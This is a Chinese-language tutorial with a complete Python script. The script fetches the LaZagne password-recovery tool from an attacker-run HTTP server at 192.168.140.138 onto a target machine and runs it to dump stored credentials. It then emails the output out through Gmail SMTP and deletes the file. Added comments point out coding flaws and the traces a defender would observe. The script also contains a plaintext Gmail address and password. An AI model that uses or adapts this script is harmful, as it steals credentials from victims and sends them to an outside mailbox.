利用Python实现文件下载、执行文件并上报执行结果
应用场景:在Kali Linux本地启用HTTP服务器,并准备好相关的可执行文件,如可以获取用户信息的lazagne.exe,当下载到目标机器后,执行该文件,并将结果通过邮件进行上报。
主要步骤:
1. 利用requests模块实现文件下载(以及文件名称的自动提取)
2. 利用subprocess模块实现命令的执行
3. 利用smtplib模块实现邮件的发送
import subprocess
import smtplib
from email.mime.text import MIMEText
from email.header import Header
import sys
import re  # imported but not used anywhere in this file
import requests
import os
import tempfile

"""
Get all profiles
Get password for each profile
Email Send
"""


def download_file(url):
    """Fetch ``url`` over HTTP and write the body to the current directory.

    The local file name is the last ``/``-separated segment of ``url``; the
    request carries a fixed Firefox User-Agent string. Only ``.content`` is
    read -- the HTTP status code is never examined, so an error page would
    be saved under the same file name. The bare ``except`` discards every
    failure, so the caller cannot tell whether a file was written.
    """
    print(url)
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0'
    }
    filename = url.split("/")[-1]
    try:
        response = requests.get(url, headers=headers).content
        # Printed before the file is opened, so this message does not
        # confirm that the write below succeeded.
        print("Downloaded successfully!")
        with open(filename, 'wb') as f:
            f.write(response)
    except:
        pass


def execute_command(command):
    """Run ``command`` via the system shell and return stdout+stderr as bytes.

    Returns ``None`` (implicitly) when the command cannot be started or
    exits non-zero: ``check_output`` raises in both cases and the bare
    ``except`` swallows the exception, so failure and "no output" are
    indistinguishable to the caller.
    """
    try:
        # shell=True hands the string to the platform shell, so a command
        # line assembled from untrusted text would be injectable; here the
        # only caller passes a fixed literal.
        result = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT)
        return result
    except:
        pass


def send_email(username, password, result):
    """Mail ``result`` to ``username`` through smtp.gmail.com:587 with STARTTLS.

    ``username`` serves as sender, recipient and SMTP login name;
    ``password`` is the SMTP login secret. ``result`` is passed to
    ``MIMEText`` unchanged -- the caller in this file passes the raw bytes
    returned by ``check_output``. Authentication or connection failures are
    silently dropped by the bare ``except``; only success is reported.
    """
    try:
        message = MIMEText(result, 'plain', 'utf-8')
        message['From'] = Header(username, 'utf-8')
        message['To'] = Header(username, 'utf-8')
        mail_server = smtplib.SMTP("smtp.gmail.com", 587)
        mail_server.starttls()
        mail_server.login(username, password)
        mail_server.sendmail(username, username, message.as_string())
        print("Successfully to send!")
    except:
        pass


if __name__ == "__main__":
    # NOTE(review): the mailbox credentials are embedded in plain text in
    # the script itself, so anyone who can read this file -- including
    # whoever finds it on the machine it ran on -- obtains them.
    username = 'junhua.wong.2013@gmail.com'
    password = '762326&^@#@^'
    url = 'http://192.168.140.138:8000/lazagne.exe'
    filename = url.split('/')[-1]
    # Computed but never used: execute_command() below is called with a
    # literal instead, so changing ``url`` alone does not change what runs.
    command = filename + ' all'
    # Get the target machine's temp directory and change into it, so the
    # download lands there.
    temp_dir = tempfile.gettempdir()
    os.chdir(temp_dir)
    download_file(url)
    result = execute_command('lazagne.exe all')
    # execute_command() returns None both when the download never happened
    # and when the program exited non-zero; either way, stop here.
    if result is None:
        sys.exit()
    send_email(username, password, result)
    # From a defender's point of view the observable sequence is: an HTTP
    # GET to the staging host, an executable written to the temp dir, a
    # shell-spawned child process, outbound SMTP on 587, then the file
    # being deleted -- removal errors are ignored.
    try:
        os.remove(filename)
    except:
        pass